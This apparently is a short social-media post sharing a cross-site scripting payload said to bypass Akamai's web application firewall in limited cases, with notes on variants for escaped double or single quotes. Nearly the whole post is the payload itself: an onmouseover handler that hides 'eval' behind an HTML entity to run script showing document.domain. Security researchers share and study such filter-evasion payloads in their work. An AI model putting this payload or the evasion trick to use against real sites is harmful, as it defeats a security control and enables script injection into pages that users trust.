Limited case Akamai WAF bypass : by @xhzeem

<xhzeem/x=” onmouseover=eva&#x6c;?.(id+/(document.domain)/.source) id=confirm>

Works in cases where double quotes are escaped

<xhzeem/x=\” ….>

can also work with single quotes (change it in the payload)

#xss #infosec #cybersec